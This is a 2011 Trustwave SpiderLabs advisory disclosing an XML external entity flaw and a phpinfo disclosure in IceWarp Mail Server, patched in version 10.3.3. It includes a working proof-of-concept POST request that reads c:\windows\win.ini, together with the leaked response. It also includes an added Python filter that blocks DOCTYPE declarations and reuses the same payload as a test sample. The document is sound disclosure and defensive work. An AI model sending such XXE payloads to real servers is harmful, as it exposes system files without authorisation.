- Published: 2011-09-23
- Version: 1.0
- Vendor: IceWarp (http://www.icewarp.com)
- Product: IceWarp Mail Server
- Version affected: 10.3.2 and below
- Product description: IceWarp WebMail is the web front-end for the IceWarp
- Mail Server, which provides email access on over 50,000 servers. IceWarp
- WebMail provides web-based access to email, calendars, contacts, files
- and shared data from any computer with a browser and Internet connection.
- Credit: David Kirkpatrick of Trustwave's SpiderLabs
- Finding 1: XML External Entity Injection
- CVE: CVE-2011-3579
- An external entity is a feature of the XML specification which allows XML
- documents to reference resources external to the XML document. When the
- application's XML parser resolves such an entity, it is forced to access
- the resource specified.
- In this case it is possible to inject an XML DOCTYPE "SYSTEM" directive to
- access local files on the operating system where the IceWarp server is
- installed. Using this technique it is possible to retrieve readable files
- on the operating system. This attack can also be used to create a possible
- denial of service condition.
- Proof-of-Concept:
- The following POST request was sent to the host A.B.C.D where the IceWarp
- mail server was running:
- REQUEST
- =========
- POST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1
- Host: A.B.C.D
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0
- Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-gb,en;q=0.5
- Accept-Encoding: gzip, deflate
- Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
- Proxy-Connection: keep-alive
- Referer: http://A.B.C.D
- Content-Length: 249
- Content-Type: application/xml;charset=UTF-8
- Pragma: no-cache
- Cache-Control: no-cache
- <!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini"> ]><iq
- type="set"><query
- xmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c
- 6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffc
- d2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method><
- /query></iq>
- RESPONSE:
- ==========
- HTTP/1.1 200 OK
- Server: IceWarp/9.4.2
- Date: Wed, 20 Jul 2011 10:04:56 GMT
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Content-Type: text/xml
- Vary: Accept-Encoding
- Content-Length: 1113
- <?xml version="1.0" encoding="utf-8"?><iq type="error"><error
- uid="login_invalid">test; for 16-bit app support
- [fonts]
- [extensions]
- [mci extensions]
- [files]
- [Mail]
- MAPI=1
- ....TRUNCATED
- The above proof-of-concept would retrieve the c:\windows\win.ini file (the
- response in this example has been truncated).
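The following is an added example, not part of the Trustwave advisory and not IceWarp code: a pre-parse gate a defender could place in front of an XML endpoint to reject messages that declare a DOCTYPE or external entity, as the request in Finding 1 does. The function names and both sample messages are constructed for illustration (the digest is a placeholder).

```python
import xml.parsers.expat as expat

def inspect_xml(body: bytes) -> dict:
    """Walk the message with expat and record DTD features without resolving them."""
    found = {"doctype": False, "external": [], "internal": [], "well_formed": True}
    parser = expat.ParserCreate()
    # Never load external DTD subsets or parameter entities (expat's default, set explicitly).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        found["doctype"] = True

    def on_entity(name, is_parameter, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            found["external"].append((name, system_id))  # SYSTEM / PUBLIC entity
        else:
            found["internal"].append(name)               # entity expansion (DoS) risk

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    # No ExternalEntityRefHandler is installed, so nothing is ever fetched.
    try:
        parser.Parse(body, True)
    except expat.ExpatError:
        found["well_formed"] = False
    return found

def gate(body: bytes) -> str:
    """Return 'allow' or a 'block: ...' reason suitable for a log line."""
    found = inspect_xml(body)
    if found["external"]:
        names = ", ".join(f"{n} -> {s}" for n, s in found["external"])
        return f"block: external entity declared ({names})"
    if found["doctype"]:
        return "block: DOCTYPE not permitted in protocol messages"
    if not found["well_formed"]:
        return "block: malformed XML"
    return "allow"

# Constructed samples modelled on the login message shown in the advisory.
BENIGN = (b'<iq type="set"><query xmlns="webmail:iq:auth"><username>test</username>'
          b'<digest>00</digest><method>RSA</method></query></iq>')
SUSPECT = (b'<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini"> ]>'
           b'<iq type="set"><query xmlns="webmail:iq:auth"><username>test&xxeb91c4;'
           b'</username><digest>00</digest><method>RSA</method></query></iq>')

if __name__ == "__main__":
    for label, msg in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, "->", gate(msg))
```

A protocol message such as this login request has no legitimate need for a DTD, so rejecting any DOCTYPE outright also covers the denial-of-service case mentioned above.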
- Finding 2: PHP Information Disclosure
- CVE: CVE-2011-3580
- It is possible to retrieve the output of phpinfo() by accessing the URL
- http://A.B.C.D/server, where A.B.C.D is the IP address of the server
- running the IceWarp software. The response is a page detailing the PHP
- version in use and the PHP configuration settings, including system
- details.
- Vendor Response: These issues have been addressed as of version 10.3.3
- Remediation Steps: Customers should update to the latest version of IceWarp
- Mail Server in order to address these issues. The above issues have been
- corrected in version 10.3.3.
- Revision History:
- 08/03/11 - Vulnerability disclosed
- 09/19/11 - Patch released
- 09/23/11 - Advisory published
- About Trustwave: Trustwave is the leading provider of on-demand and
- subscription-based information security and payment card industry
- compliance management solutions to businesses and government entities
- throughout the world. For organizations faced with today's challenging
- data security and compliance environment, Trustwave provides a unique
- approach with comprehensive solutions that include its flagship
- TrustKeeper compliance management software and other proprietary security
- solutions. Trustwave has helped thousands of organizations--ranging from
- Fortune 500 businesses and large financial institutions to small and
- medium-sized retailers--manage compliance and secure their network
- infrastructure, data communications and critical information assets.
- Trustwave is headquartered in Chicago with offices throughout North
- America, South America, Europe, Africa, China and Australia.
- About Trustwave's SpiderLabs: SpiderLabs is the advanced security team at
- Trustwave responsible for incident response and forensics, ethical hacking
- and application security tests for Trustwave's clients. SpiderLabs has
- responded to hundreds of security incidents, performed thousands of ethical
- hacking exercises and tested the security of hundreds of business
- applications for Fortune 500 organizations. For more information visit
- https://www.trustwave.com/spiderlabs
- Disclaimer: The information provided in this advisory is provided "as is"
- without warranty of any kind. Trustwave disclaims all warranties, either
- express or implied, including the warranties of merchantability and fitness
- for a particular purpose. In no event shall Trustwave or its suppliers be
- liable for any damages whatsoever including direct, indirect, incidental,
- consequential, loss of business profits or special damages, even if
- Trustwave or its suppliers have been advised of the possibility of such
- damages. Some states do not allow the exclusion or limitation of liability
- for consequential or incidental damages so the foregoing limitation may not
- apply.